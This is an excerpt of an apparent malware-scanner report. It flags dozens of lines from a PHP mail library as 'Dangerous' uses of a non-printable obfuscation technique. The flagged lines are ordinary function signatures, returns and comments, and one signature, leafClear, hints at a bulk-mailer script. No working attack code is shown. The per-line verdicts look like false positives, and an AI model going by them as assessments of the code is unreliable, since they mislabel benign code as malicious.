</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
